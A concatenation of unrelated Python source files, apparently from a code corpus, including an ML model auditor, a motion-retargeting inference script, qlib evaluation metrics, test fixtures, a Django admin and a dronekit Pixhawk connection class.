point_list.append(
(check_point[0], check_point[1]-1, check_point))
if check_point[1] <= height-1 and map[check_point[0]][check_point[1]+1] == 1:
point_list.append(
(check_point[0], check_point[1]+1, check_point))
# remove from list
point_list.remove(point)
# open door in room walls
open_door(map, rooms, door_ratio)
# output
for x in map:
for y in x:
if y == 0 or y == 2 or y == 4:
print(' ', end='')
else:
print('▉', end='')
print()
print()
args = sys.argv[1:]
maze(int(args[0]), int(args[1]), int(args[2]),
     int(args[3]), int(args[4]), float(args[5]))  # door_ratio is a fraction in [0, 1], so parse it as float
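# Example invocation (illustrative; the file name is assumed, arguments are
# height, width, room count, max room side, min room side, door ratio):
#   python maze.py 41 41 4 9 5 0.3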
# -*- coding: utf-8 -*-
"""Main module."""
import warnings
from collections import Counter
from math import sqrt
import mlprimitives
import numpy as np
from mlblocks import MLPipeline
from scipy.stats import entropy
from sklearn import metrics
from sklearn.model_selection import KFold
from sklearn.neighbors import NearestNeighbors
import pandas as pd
from cardea.modeling.modeler import Modeler
class ModelAuditor():
__name__ = 'ModelAuditor'
def run_fold(self, features_train, target, feature_test, primitive, hyperparameters=None):
        '''Runs a single fold: fits the pipeline on the training features and predicts the testing features.
Args:
            features_train: the training features.
            target: the training target values.
            feature_test: the testing features.
primitive: the machine learning primitive to run.
hyperparameters: the hyperparameters of the given primitives.
Returns:
A list of the folds' results for the primitives that are passed.
'''
# assert that the features and targets have the same size
modeler = Modeler()
#pipeline = self.create_pipeline(primitive, hyperparameters)
pipeline = modeler.create_pipeline(primitive, hyperparameters)
last_block_in_pipeline = list(pipeline.blocks.values())[-1]
#Add an if statement based on the type of output for the last block (array, ndarray, DataFrame)
for output in last_block_in_pipeline.produce_output:
check_name = output['name'] == 'X' or output['name'] == 'y'
check_numpy = output['type'] == 'array' or output['type'] == 'ndarray'
check_pandas = output['type'] == 'DataFrame' or output['type'] == 'Series'
if check_name and (check_numpy or check_pandas):
features_train = pd.DataFrame(features_train)
feature_test = pd.DataFrame(feature_test)
target = pd.Series(target)
return modeler.fit_predict_model(features_train, target, feature_test, pipeline)
return None
def generate_kfolds(self, features, target, n_folds=10):
'''Creates Kfold cross-validation for the given features and targets
Args:
features: The features as a numpy array to create the k-folds for
target: a list of the folds targets
n_folds: the number of folds to create
Returns:
a tuple that consist of two values, the folds features and the folds targets
'''
kf = KFold(n_splits=n_folds, shuffle=True)
folds_features = []
folds_targets = []
for train_index, test_index in kf.split(features):
X_train = features[train_index]
X_test = features[test_index]
y_train = target[train_index]
y_test = target[test_index]
folds_features.append([X_train, X_test])
folds_targets.append([y_train, y_test])
return folds_features, folds_targets
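    # Example (illustrative): with features of shape (100, 5) and 100 targets,
    #   folds_X, folds_y = ModelAuditor().generate_kfolds(features, target, n_folds=10)
    # gives len(folds_X) == 10, where folds_X[i] == [X_train, X_test] and
    # folds_y[i] == [y_train, y_test] for the i-th fold.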
def execute_pipeline(self, pipeline_primitives, features_train, target,
features_test, problem_type, hyperparameters = None,
with_intermediate = False):
'''Executes a pipeline and generates all the intermediates of the pipeline.
Args:
pipeline_primitives: Array of the pipeline primitives.
features_train: the training features data to run through the pipeline.
features_test: the testing features data to run through the pipeline.
target: The target of the training data to run through the pipeline.
problem_type: the type of the problem (classification or regression).
hyperparameters: the hyperparameters to run for the model
with_intermediate: A boolean to add or ignore the intermediates metrics.
Returns:
a tuple that consist of three values,the intermediates,
the folds features and the folds targets.
'''
pipeline_intermediates = []
if with_intermediate:
all_partial_primitives = [pipeline_primitives[:index] for index in range(1,len(pipeline_primitives) + 1)]
else:
all_partial_primitives = [pipeline_primitives]
for partial_primitives in all_partial_primitives:
pipeline_results = self.run_fold(features_train, target,
features_test, partial_primitives,
hyperparameters)
#if pipeline_results != None:
pipeline_intermediates.append(pipeline_results)
return pipeline_intermediates
def report_regression_result(self, actual, predicted):
'''Reports the prediction results for a regression model.
Args:
actual: A 1d list of the target variable for the actual test data.
predicted: A 1d list of the prediction result.
Returns:
A json object of various evaluation metrics for regression.
'''
metrics_to_calculate = [['explained_variance_score', metrics.explained_variance_score],
['mean_absolute_error', metrics.mean_absolute_error],
['mean_squared_error', metrics.mean_squared_error],
['mean_squared_log_error', metrics.mean_squared_log_error],
['median_absolute_error', metrics.median_absolute_error],
['r2_score', metrics.r2_score]]
results_dict = {}
for metric in metrics_to_calculate:
try:
results_dict[metric[0]] = metric[1](actual, predicted)
except BaseException:
warnings.warn(
'{} can\'t be calculated for this data'.format(metric[0]),
UserWarning)
return results_dict
def report_classification_result(self, actual, predicted):
'''Reports the prediction results for a classification model.
Args:
actual: A 1d list of the target variable for the actual test data.
predicted: A 1d list of the prediction result.
Returns:
A json object of various evaluation metrics for classification.
'''
metrics_to_calculate = [['accuracy', metrics.accuracy_score],
['f1', metrics.f1_score],
['precision', metrics.precision_score],
['recall', metrics.recall_score],
['class_count', Counter]]
results_dict = {}
for metric in metrics_to_calculate:
try:
if metric[0] == 'accuracy':
results_dict[metric[0]] = metric[1](actual, predicted)
elif metric[0] == 'class_count':
counter_dict = metric[1](predicted)
label_count_sum = sum(counter_dict.values())
for label in counter_dict.keys():
results_dict['{}_{}'.format(metric[0], str(
label))] = counter_dict[label] / label_count_sum
else:
results_dict['{}_macro'.format(metric[0])] = metric[1](
actual, predicted, average='macro')
except BaseException:
warnings.warn(
'{} can\'t be calculated for this data'.format(metric[0]),
UserWarning)
return results_dict
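    # Example (illustrative): report_classification_result([1, 0, 1], [1, 1, 1]) returns a
    # dict with keys such as 'accuracy' (2/3 here), 'f1_macro', 'precision_macro',
    # 'recall_macro' and 'class_count_1' (the share of predictions per predicted label).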
def euclidean_distance(self, x, y):
'''Computes the euclidean distance between two vectors.
Args:
x: The first vector.
y: The second vector.
Returns:
The euclidean distance.
'''
return sqrt(sum(pow(a - b, 2) for a, b in zip(x, y)))
def intermediate_metrics(self, intermediate):
'''Generates metrics of the intermediates (features data in-between primitives).
Args:
intermediate: The intermediate data that must be investigated (for a single fold).
Returns:
A Summary metrics for the different data columns in the intermediate.
'''
if type(intermediate) != pd.DataFrame:
intermediate = pd.DataFrame(intermediate)
summary = {}
for column_name in list(intermediate.columns):
intermediate_column = intermediate[column_name]
col_metrics = {}
col_metrics['index'] = column_name
col_metrics['perc_25'] = np.percentile(intermediate_column, 25)
col_metrics['perc_50'] = np.percentile(intermediate_column, 50)
col_metrics['perc_75'] = np.percentile(intermediate_column, 75)
col_metrics['variance'] = np.var(intermediate_column)
col_metrics['std'] = np.std(intermediate_column)
col_metrics['entropy'] = entropy(intermediate_column)
summary[column_name] = col_metrics
return summary
def find_k_nearest_neighbors(self, data, instance, k=5):
'''Finds the k-nearest neighbors from the data to an instance.
Args:
data: The data that will be searched to find the nearest neighbors.
instance: the instance that needs to identify its nearest neighbors.
k: the number of nearest neighbors to consider.
Returns:
Array of the k nearest neighbors to the instance.
'''
nbrs = NearestNeighbors(n_neighbors=k, algorithm='ball_tree').fit(data)
distances, indices = nbrs.kneighbors([instance])
return data[indices]
def summarize_nearest_neighbors(self, folds_features, folds_targets, k=5):
'''Summarizes the nearest neighbors of a sample in the data.
Args:
folds_features: The folds containing the training and testing of the features data.
folds_targets: The folds containing the training and testing of the target data.
k: the number of nearest neighbors to consider
Returns:
Summary of all the features for the nearest neighbors.
'''
nearest_neighbors_summary = []
for x, y in zip(folds_features, folds_targets):
X_train = x[0]
X_test = x[1]
y_test = y[1]
indices_to_select = np.random.choice(range(len(X_test)), k, replace=False)
chosen_instances_features = X_test[indices_to_select]
chosen_instances_targets = y_test[indices_to_select]
fold_nearest_neighbors_summary = []
for instance_features, instance_target in zip(
chosen_instances_features, chosen_instances_targets):
nearest_neighbors = self.find_k_nearest_neighbors(X_train, instance_features, k)
neighbors_summary = self.intermediate_metrics(nearest_neighbors)
fold_nearest_neighbors_summary.append({'instance_features': instance_features,
'instance_target': instance_target,
'neighbors_summary': neighbors_summary})
nearest_neighbors_summary.append(fold_nearest_neighbors_summary)
return nearest_neighbors_summary
def generate_pipeline_report(self, pipeline_primitives, features,
target, problem_type, hyperparameters = None,
with_intermediates_metrics = False,
with_nearest_neighbors = False):
'''Generates the full report of the model auditor in a json format.
Args:
pipeline_primitives: Array of the pipeline primitives to run.
features: The features data to run through the pipeline.
target: The target data to run through the pipeline.
problem_type: The type of the problem (classification or regression).
hyperparameters: Specify parameters that must be specified in the primitives.
with_nearest_neighbors: A boolean to add or ignore the nearest neighbors metrics.
with_intermediates_metrics: A boolean to add or ignore the intermediates metrics.
Returns:
A json file of the model auditing results.
'''
report = {}
# Generate the folds
columns_names = list(features.columns)
features = np.array(features)
target = np.array(target)
folds_features, folds_targets = self.generate_kfolds(features, target)
# create the intermediates
intermediates_list = []
for x, y in zip(folds_features, folds_targets):
X_train = pd.DataFrame(x[0],columns = columns_names)
X_test = pd.DataFrame(x[1],columns = columns_names)
y_train = y[0]
fold_intermediates_list = self.execute_pipeline(pipeline_primitives, X_train,
y_train, X_test, problem_type,
with_intermediate = with_intermediates_metrics,
hyperparameters = hyperparameters)
intermediates_list.append(fold_intermediates_list)
# print(intermediates_list)
output_result = []
if problem_type == 'classification':
for actual, predicted in zip(folds_targets, intermediates_list):
fold_result = self.report_classification_result(actual[1], predicted[-1])
output_result.append(fold_result)
elif problem_type == 'regression':
for actual, predicted in zip(folds_targets, intermediates_list):
fold_result = self.report_regression_result(actual[1], predicted[-1])
output_result.append(fold_result)
report['output_result'] = output_result
if with_intermediates_metrics:
intermediates_metrics = {}
for fold in intermediates_list:
for idx,intermediate in enumerate(fold[:-1]):
intermediate_key = str(idx)+ '.' + pipeline_primitives[idx]
try:
intermediate_result = self.intermediate_metrics(intermediate)
intermediates_metrics[intermediate_key] = intermediate_result
except BaseException as e:
print(e.args)
warnings.warn(
'intermediate metrics can\'t be calculated for {}'.format(intermediate_key),
UserWarning)
report['intermediates_result'] = intermediates_metrics
if with_nearest_neighbors:
nearest_neighbors = self.summarize_nearest_neighbors(folds_features, folds_targets, k=5)
report['nearest_neighbors'] = nearest_neighbors
return report
def generate_pipeline_report_with_test(self, pipeline_primitives, features,
target, test, actual, problem_type, hyperparameters = None,
with_intermediates_metrics = False,
with_nearest_neighbors = False):
'''Generates the full report of the model auditor in a json format.
Args:
pipeline_primitives: Array of the pipeline primitives to run.
features: The features data to run through the pipeline.
target: The target data to run through the pipeline.
problem_type: The type of the problem (classification or regression).
hyperparameters: Specify parameters that must be specified in the primitives.
with_nearest_neighbors: A boolean to add or ignore the nearest neighbors metrics.
with_intermediates_metrics: A boolean to add or ignore the intermediates metrics.
Returns:
A json file of the model auditing results.
'''
report = {}
# Generate the folds
columns_names = list(features.columns)
X_train = np.array(features)
y_train = np.array(target)
X_test = np.array(test)
y_test = np.array(actual)
# print("X_train ", X_train.shape)
# print("y_train ", y_train.shape)
# print("X_test ", X_test.shape)
# print("y_test ", y_test.shape)
y_pred = self.execute_pipeline(pipeline_primitives, X_train, y_train, X_test, problem_type,
with_intermediate=False,
hyperparameters=hyperparameters)
output_result = []
if problem_type == 'classification':
fold_result = self.report_classification_result(y_test, y_pred[-1])
output_result.append(fold_result)
elif problem_type == 'regression':
fold_result = self.report_regression_result(y_test, y_pred[-1])
output_result.append(fold_result)
report['output_result'] = output_result
if with_nearest_neighbors:
nearest_neighbors = self.summarize_nearest_neighbors(X_test, y_test, k=5)
report['nearest_neighbors'] = nearest_neighbors
return report
import torch
import torch.nn as nn
import torch.optim as optim
import torch_geometric.transforms as transforms
from torch_geometric.data import Data, Batch
from tensorboardX import SummaryWriter
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import mpl_toolkits.mplot3d.axes3d as p3
import numpy as np
import h5py
import argparse
import logging
import time
import os
import copy
from datetime import datetime
import dataset
from dataset import Normalize, parse_h5
from models import model
from models.loss import CollisionLoss, JointLimitLoss, RegLoss
from train import train_epoch
from utils.config import cfg
from utils.util import create_folder
# Argument parse
parser = argparse.ArgumentParser(description='Inference with trained model')
parser.add_argument('--cfg', default='configs/inference/yumi.yaml', type=str, help='Path to configuration file')
args = parser.parse_args()
# Configurations parse
cfg.merge_from_file(args.cfg)
cfg.freeze()
print(cfg)
# Create folder
create_folder(cfg.OTHERS.SAVE)
create_folder(cfg.OTHERS.LOG)
create_folder(cfg.OTHERS.SUMMARY)
# Create logger & tensorboard writer
logging.basicConfig(level=logging.INFO, format="%(message)s", handlers=[logging.FileHandler(os.path.join(cfg.OTHERS.LOG, "{:%Y-%m-%d_%H-%M-%S}.log".format(datetime.now()))), logging.StreamHandler()])
logger = logging.getLogger()
writer = SummaryWriter(os.path.join(cfg.OTHERS.SUMMARY, "{:%Y-%m-%d_%H-%M-%S}".format(datetime.now())))
# Device setting
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
if __name__ == '__main__':
# Load data
pre_transform = transforms.Compose([Normalize()])
test_data, l_hand_angle, r_hand_angle= parse_h5(filename=cfg.INFERENCE.MOTION.SOURCE, selected_key=cfg.INFERENCE.MOTION.KEY)
test_data = [pre_transform(data) for data in test_data]
indices = [idx for idx in range(0, len(test_data), cfg.HYPER.BATCH_SIZE)]
test_loader = [test_data[idx: idx+cfg.HYPER.BATCH_SIZE] for idx in indices]
test_target = sorted([target for target in getattr(dataset, cfg.DATASET.TEST.TARGET_NAME)(root=cfg.DATASET.TEST.TARGET_PATH)], key=lambda target : target.skeleton_type)
hf = h5py.File(os.path.join(cfg.INFERENCE.H5.PATH, 'source.h5'), 'w')
g1 = hf.create_group('group1')
source_pos = torch.stack([data.pos for data in test_data], dim=0)
g1.create_dataset('l_joint_pos_2', data=source_pos[:, :3])
g1.create_dataset('r_joint_pos_2', data=source_pos[:, 3:])
hf.close()
print('Source H5 file saved!')
# Create model
model = getattr(model, cfg.MODEL.NAME)().to(device)
# Load checkpoint
if cfg.MODEL.CHECKPOINT is not None:
model.load_state_dict(torch.load(cfg.MODEL.CHECKPOINT))
# store initial z
model.eval()
z_all = []
for batch_idx, data_list in enumerate(test_loader):
for target_idx, target in enumerate(test_target):
# fetch target
target_list = [target for data in data_list]
# forward
z = model.encode(Batch.from_data_list(data_list).to(device)).detach()
# z = torch.empty(Batch.from_data_list(target_list).x.size(0), 64).normal_(mean=0, std=0.005).to(device)
z.requires_grad = True
z_all.append(z)
# Create loss criterion
# end effector loss
ee_criterion = nn.MSELoss() if cfg.LOSS.EE else None
# vector similarity loss
vec_criterion = nn.MSELoss() if cfg.LOSS.VEC else None
# collision loss
col_criterion = CollisionLoss(cfg.LOSS.COL_THRESHOLD) if cfg.LOSS.COL else None
# joint limit loss
lim_criterion = JointLimitLoss() if cfg.LOSS.LIM else None
# end effector orientation loss
ori_criterion = nn.MSELoss() if cfg.LOSS.ORI else None
# regularization loss
reg_criterion = RegLoss() if cfg.LOSS.REG else None
# Create optimizer
optimizer = optim.Adam(z_all, lr=cfg.HYPER.LEARNING_RATE)
best_loss = float('Inf')
best_z_all = copy.deepcopy(z_all)
best_cnt = 0
start_time = time.time()
# latent optimization
for epoch in range(cfg.HYPER.EPOCHS):
train_loss = train_epoch(model,
ee_criterion, vec_criterion, col_criterion, lim_criterion, ori_criterion, reg_criterion,
optimizer,
test_loader, test_target,
epoch, logger, cfg.OTHERS.LOG_INTERVAL, writer, device, z_all)
# Save model
if train_loss > best_loss:
best_cnt += 1
else:
best_cnt = 0
best_loss = train_loss
best_z_all = copy.deepcopy(z_all)
if best_cnt == 5:
logger.info("Interation Finished")
break
print(best_cnt)
# store final results
model.eval()
pos_all = []
ang_all = []
for batch_idx, data_list in enumerate(test_loader):
for target_idx, target in enumerate(test_target):
# fetch target
target_list = [target for data in data_list]
# fetch z
z = best_z_all[batch_idx]
# forward
target_ang, target_pos, _, _, _, _, target_global_pos = model.decode(z, Batch.from_data_list(target_list).to(z.device))
pos_all.append(target_global_pos)
ang_all.append(target_ang)
if cfg.INFERENCE.H5.BOOL:
pos = torch.cat(pos_all, dim=0).view(len(test_data), -1, 3).detach().cpu().numpy() # [T, joint_num, xyz]
ang = torch.cat(ang_all, dim=0).view(len(test_data), -1).detach().cpu().numpy()
hf = h5py.File(os.path.join(cfg.INFERENCE.H5.PATH, 'inference.h5'), 'w')
g1 = hf.create_group('group1')
g1.create_dataset('l_joint_pos_2', data=pos[:, :7])
g1.create_dataset('r_joint_pos_2', data=pos[:, 7:])
g1.create_dataset('l_joint_angle_2', data=ang[:, :7])
g1.create_dataset('r_joint_angle_2', data=ang[:, 7:])
g1.create_dataset('l_glove_angle_2', data=l_hand_angle)
g1.create_dataset('r_glove_angle_2', data=r_hand_angle)
hf.close()
print('Target H5 file saved!')
| python |
"""
:Copyright: 2014-2022 Jochen Kupperschmidt
:License: Revised BSD (see `LICENSE` file for details)
"""
from typing import Optional
import pytest
from byceps.services.board.dbmodels.posting import Posting as DbPosting
from byceps.services.board.dbmodels.topic import Topic as DbTopic
from byceps.services.board.transfer.models import Board, Category
from byceps.services.user.transfer.models import User
from tests.helpers import log_in_user
from .helpers import create_category, create_posting, create_topic
@pytest.fixture(scope='package')
def category(board: Board) -> Category:
return create_category(board.id, number=1)
@pytest.fixture(scope='package')
def another_category(board: Board) -> Category:
return create_category(board.id, number=2)
@pytest.fixture
def topic(category: Category, board_poster: User) -> DbTopic:
return create_topic(category.id, board_poster.id)
@pytest.fixture
def posting(topic: DbTopic, board_poster: User) -> DbPosting:
return create_posting(topic.id, board_poster.id)
@pytest.fixture(scope='package')
def board_poster(make_user) -> User:
return make_user()
@pytest.fixture(scope='package')
def moderator(make_admin) -> User:
permission_ids = {
'board.hide',
'board_topic.lock',
'board_topic.move',
'board_topic.pin',
}
moderator = make_admin(permission_ids)
log_in_user(moderator.id)
return moderator
@pytest.fixture(scope='package')
def moderator_client(make_client, site_app, moderator: User):
return make_client(site_app, user_id=moderator.id)
| python |
"""
Here is a batch of evaluation functions.
The interface should be redesigned carefully in the future.
"""
import pandas as pd
from typing import Tuple
from qlib import get_module_logger
from qlib.utils.paral import complex_parallel, DelayedDict
from joblib import Parallel, delayed
def calc_long_short_prec(
pred: pd.Series, label: pd.Series, date_col="datetime", quantile: float = 0.2, dropna=False, is_alpha=False
) -> Tuple[pd.Series, pd.Series]:
"""
calculate the precision for long and short operation
:param pred/label: index is **pd.MultiIndex**, index name is **[datetime, instruments]**; columns names is **[score]**.
.. code-block:: python
score
datetime instrument
2020-12-01 09:30:00 SH600068 0.553634
SH600195 0.550017
SH600276 0.540321
SH600584 0.517297
SH600715 0.544674
label :
label
date_col :
date_col
Returns
-------
(pd.Series, pd.Series)
long precision and short precision in time level
"""
if is_alpha:
label = label - label.mean(level=date_col)
if int(1 / quantile) >= len(label.index.get_level_values(1).unique()):
raise ValueError("Need more instruments to calculate precision")
df = pd.DataFrame({"pred": pred, "label": label})
if dropna:
df.dropna(inplace=True)
group = df.groupby(level=date_col)
N = lambda x: int(len(x) * quantile)
# find the top/low quantile of prediction and treat them as long and short target
long = group.apply(lambda x: x.nlargest(N(x), columns="pred").label).reset_index(level=0, drop=True)
short = group.apply(lambda x: x.nsmallest(N(x), columns="pred").label).reset_index(level=0, drop=True)
groupll = long.groupby(date_col)
l_dom = groupll.apply(lambda x: x > 0)
l_c = groupll.count()
groups = short.groupby(date_col)
s_dom = groups.apply(lambda x: x < 0)
s_c = groups.count()
return (l_dom.groupby(date_col).sum() / l_c), (s_dom.groupby(date_col).sum() / s_c)
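# Usage sketch (toy data, an assumption for illustration): build a (datetime, instrument)
# MultiIndex with 10 instruments on one day, rank-aligned pred and centered label, so the
# top-quantile picks have positive labels and the bottom-quantile picks negative ones.
#   idx = pd.MultiIndex.from_product(
#       [pd.to_datetime(["2020-12-01"]), [f"SH{i:06d}" for i in range(10)]],
#       names=["datetime", "instrument"])
#   pred = pd.Series([float(i) for i in range(10)], index=idx)
#   label = pd.Series([i - 4.5 for i in range(10)], index=idx)
#   l_prec, s_prec = calc_long_short_prec(pred, label, quantile=0.2)
#   # both returned Series equal 1.0 for the single day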
def calc_long_short_return(
pred: pd.Series,
label: pd.Series,
date_col: str = "datetime",
quantile: float = 0.2,
dropna: bool = False,
) -> Tuple[pd.Series, pd.Series]:
"""
calculate long-short return
Note:
`label` must be raw stock returns.
Parameters
----------
pred : pd.Series
stock predictions
label : pd.Series
stock returns
date_col : str
datetime index name
quantile : float
long-short quantile
Returns
----------
long_short_r : pd.Series
daily long-short returns
long_avg_r : pd.Series
daily long-average returns
"""
df = pd.DataFrame({"pred": pred, "label": label})
if dropna:
df.dropna(inplace=True)
group = df.groupby(level=date_col)
N = lambda x: int(len(x) * quantile)
r_long = group.apply(lambda x: x.nlargest(N(x), columns="pred").label.mean())
r_short = group.apply(lambda x: x.nsmallest(N(x), columns="pred").label.mean())
r_avg = group.label.mean()
return (r_long - r_short) / 2, r_avg
def pred_autocorr(pred: pd.Series, lag=1, inst_col="instrument", date_col="datetime"):
"""pred_autocorr.
Limitation:
    - If the datetime is not densely sequential, the correlation will be calculated based on adjacent dates (some users may expect NaN).
:param pred: pd.Series with following format
instrument datetime
SH600000 2016-01-04 -0.000403
2016-01-05 -0.000753
2016-01-06 -0.021801
2016-01-07 -0.065230
2016-01-08 -0.062465
:type pred: pd.Series
:param lag:
"""
if isinstance(pred, pd.DataFrame):
pred = pred.iloc[:, 0]
get_module_logger("pred_autocorr").warning("Only the first column in {pred.columns} of `pred` is kept")
pred_ustk = pred.sort_index().unstack(inst_col)
corr_s = {}
for (idx, cur), (_, prev) in zip(pred_ustk.iterrows(), pred_ustk.shift(lag).iterrows()):
corr_s[idx] = cur.corr(prev)
corr_s = pd.Series(corr_s).sort_index()
return corr_s
def pred_autocorr_all(pred_dict, n_jobs=-1, **kwargs):
"""
calculate auto correlation for pred_dict
Parameters
----------
pred_dict : dict
A dict like {<method_name>: <prediction>}
kwargs :
all these arguments will be passed into pred_autocorr
"""
ac_dict = {}
for k, pred in pred_dict.items():
ac_dict[k] = delayed(pred_autocorr)(pred, **kwargs)
return complex_parallel(Parallel(n_jobs=n_jobs, verbose=10), ac_dict)
def calc_ic(pred: pd.Series, label: pd.Series, date_col="datetime", dropna=False) -> (pd.Series, pd.Series):
"""calc_ic.
Parameters
----------
pred :
pred
label :
label
date_col :
date_col
Returns
-------
(pd.Series, pd.Series)
ic and rank ic
"""
df = pd.DataFrame({"pred": pred, "label": label})
ic = df.groupby(date_col).apply(lambda df: df["pred"].corr(df["label"]))
ric = df.groupby(date_col).apply(lambda df: df["pred"].corr(df["label"], method="spearman"))
if dropna:
return ic.dropna(), ric.dropna()
else:
return ic, ric
def calc_all_ic(pred_dict_all, label, date_col="datetime", dropna=False, n_jobs=-1):
"""calc_all_ic.
Parameters
----------
pred_dict_all :
A dict like {<method_name>: <prediction>}
label:
A pd.Series of label values
Returns
-------
{'Q2+IND_z': {'ic': <ic series like>
2016-01-04 -0.057407
...
2020-05-28 0.183470
2020-05-29 0.171393
'ric': <rank ic series like>
2016-01-04 -0.040888
...
2020-05-28 0.236665
2020-05-29 0.183886
}
...}
"""
pred_all_ics = {}
for k, pred in pred_dict_all.items():
pred_all_ics[k] = DelayedDict(["ic", "ric"], delayed(calc_ic)(pred, label, date_col=date_col, dropna=dropna))
pred_all_ics = complex_parallel(Parallel(n_jobs=n_jobs, verbose=10), pred_all_ics)
return pred_all_ics
| python |
from setuptools import setup, find_packages
from os.path import join, dirname
import sys
if sys.version_info[0] != 3 or sys.version_info[1] < 6:
print("This script requires Python >= 3.6")
exit(1)
setup(
name="vkmix",
version="1.5",
author="alekssamos",
author_email="[email protected]",
url="https://github.com/alekssamos/vkmix/",
packages=find_packages(),
include_package_data=True,
long_description_content_type="text/markdown",
long_description=open(join(dirname(__file__), "README.md"), encoding="UTF8").read(),
)
| python |
"""A basic JSON encoder to handle numpy and bytes types
>>> bool_array = np.array([True])
>>> bool_value = bool_array[0]
>>> obj = {'an_array': np.array(['a']), 'an_int64': np.int64(1), 'some_bytes': b'a', 'a_bool': bool_value}
>>> assert dumps(obj)
"""
import base64
import json
from functools import partial
import numpy as np
class OtoJsonEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, np.ndarray):
return obj.tolist()
if isinstance(obj, np.int64):
return float(obj)
if isinstance(obj, bytes):
return base64.b64encode(obj).decode('utf-8')
if isinstance(obj, np.bool_):
return True if np.bool_(True) == obj else False
return json.JSONEncoder.default(self, obj)
json_dump_partial_kwargs = {
'allow_nan': False,
'indent': None,
'separators': (',', ':'),
'sort_keys': True,
'cls': OtoJsonEncoder,
}
dump = partial(json.dump, **json_dump_partial_kwargs)
dumps = partial(json.dumps, **json_dump_partial_kwargs)
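# Worked example of the encoder's choices (a sketch): np.int64 is emitted as a float and
# bytes are emitted as base64 text, with compact separators and sorted keys.
#   dumps({'an_int64': np.int64(3), 'some_bytes': b'a'})
#   # -> '{"an_int64":3.0,"some_bytes":"YQ=="}'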
| python |
# -*- coding: utf-8 -*-
import codecs
import io
import logging
import os
import re
import shutil
import sys
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
import tempfile
if sys.version_info < (2, 7):
import unittest2 as unittest
else:
import unittest
from py3kwarn2to3 import main
TEST_DATA_DIR = os.path.join(os.path.dirname(__file__), "data")
PY2_TEST_MODULE = os.path.join(TEST_DATA_DIR, "py2_test_grammar.py")
class TestMain(unittest.TestCase):
if not hasattr(unittest.TestCase, 'assertNotRegex'):
# This method was only introduced in 3.2.
def assertNotRegex(self, text, regexp, msg=None):
if not hasattr(regexp, 'search'):
regexp = re.compile(regexp)
if regexp.search(text):
self.fail("regexp %s MATCHED text %r" % (regexp.pattern, text))
def setUp(self):
self.temp_dir = None # tearDown() will rmtree this directory if set.
def tearDown(self):
# Clean up logging configuration down by main.
del logging.root.handlers[:]
if self.temp_dir:
shutil.rmtree(self.temp_dir)
def run_2to3_capture(self, args, in_capture, out_capture, err_capture):
save_stdin = sys.stdin
save_stdout = sys.stdout
save_stderr = sys.stderr
sys.stdin = in_capture
sys.stdout = out_capture
sys.stderr = err_capture
try:
return main.main("py3kwarn2to3.fixes", args)
finally:
sys.stdin = save_stdin
sys.stdout = save_stdout
sys.stderr = save_stderr
def test_unencodable_diff(self):
input_stream = StringIO(u"print 'nothing'\nprint u'über'\n")
out = io.BytesIO() if sys.version_info[0] > 2 else StringIO()
out_enc = codecs.getwriter("ascii")(out)
err = StringIO()
ret = self.run_2to3_capture(["-"], input_stream, out_enc, err)
self.assertEqual(ret, 0)
output = out.getvalue()
if sys.version_info[0] > 2:
output = output.decode("ascii")
self.assertTrue("-print 'nothing'" in output)
self.assertTrue("WARNING: couldn't encode <stdin>'s diff for "
"your terminal" in err.getvalue())
def setup_test_source_trees(self):
"""Setup a test source tree and output destination tree."""
self.temp_dir = tempfile.mkdtemp() # tearDown() cleans this up.
self.py2_src_dir = os.path.join(self.temp_dir, "python2_project")
self.py3_dest_dir = os.path.join(self.temp_dir, "python3_project")
os.mkdir(self.py2_src_dir)
os.mkdir(self.py3_dest_dir)
# Turn it into a package with a few files.
self.setup_files = []
open(os.path.join(self.py2_src_dir, "__init__.py"), "w").close()
self.setup_files.append("__init__.py")
shutil.copy(PY2_TEST_MODULE, self.py2_src_dir)
self.setup_files.append(os.path.basename(PY2_TEST_MODULE))
self.trivial_py2_file = os.path.join(self.py2_src_dir, "trivial.py")
self.init_py2_file = os.path.join(self.py2_src_dir, "__init__.py")
with open(self.trivial_py2_file, "w") as trivial:
trivial.write("print 'I need a simple conversion.'")
self.setup_files.append("trivial.py")
if __name__ == '__main__':
unittest.main()
| python |
from django.contrib import admin
from .models import Nurse, NursePatient
class NurseAdmin(admin.ModelAdmin):
model = Nurse
list_display = ['user', ]
class NursePatientAdmin(admin.ModelAdmin):
model = NursePatient
list_display = ['nurse', 'patient', ]
admin.site.register(Nurse, NurseAdmin)
admin.site.register(NursePatient, NursePatientAdmin)
# Register your models here.
| python |
class Reactor(object) :
def addReadCallback( self, sockfd, callback ) :
raise NotImplementedError
def removeReadCallback( self, sockfd ) :
raise NotImplementedError
def addWriteCallback( self, sockfd, callback ) :
raise NotImplementedError
def removeWriteCallback( self, sockfd ) :
raise NotImplementedError
def addExceptionCallback( self, sockfd, callback ) :
raise NotImplementedError
def removeExceptionCallback( self, sockfd ) :
raise NotImplementedError
# timeout is seconds in floating point, returns async.Op
def addTimer( self, timeout, callback=None ) :
raise NotImplementedError
# single shot timer, timeout is float, return async.Op
def callLater( self, timeout, callback=None ) :
raise NotImplementedError
| python |
from dronekit import *
from pymavlink import mavutil
import argparse
import serial
import time  # used by gps_test
from random import uniform
class Pixhawk:
def __init__(self):
        self.status = "down"  # this status is used to check if a service is functioning normally or not
self.vehicle = None
def start(self):
print("starting Pixhawk")
self.status = "running"
# this function will at least connect to pixhawk for future telem data retrieval.
parser = argparse.ArgumentParser()
parser.add_argument("--connect", default="/dev/serial0")
parser.add_argument("--baud", default="921600")
args = parser.parse_args()
self.connect(args)
def stop(self):
print("stopping Telemetry Data")
self.status = "down"
# this function should kill the connection to the pixhawk and
# any other processes it has started.
self.disconnect()
def check_status(self):
# check all possible processes that may not be working properly, make sure they return
# expected values.
# return list of broken services.
if self.connection_status:
print("Status: Active")
print("GPS connection state: %s" % vehicle.gps_0)
else:
print("Status: Broken (see above for details)")
# Connect to the vehicle
def connect(self, args):
print("Connecting to aircraft via: %s" % args.connect)
try:
self.vehicle = connect(args.connect, baud=921600, wait_ready=True)
self.connection_status = 1
# Dronekit Error
except APIException:
print("The connection has timed out.")
self.connection_status = 0
self.status = "pixhawk connection broken"
# Other error
except:
print("Error connecting to pixhawk via serial.")
self.connection_status = 0
self.status = "pixhawk connection broken"
# Close vehicle connection
def disconnect(self):
self.vehicle.close()
self.connection_status = 0
# Use for testing gps signal and telemetry data retrieval. WARNING: this method creates an infinite loop.
def gps_test(self):
pass
while True:
time.sleep(1)
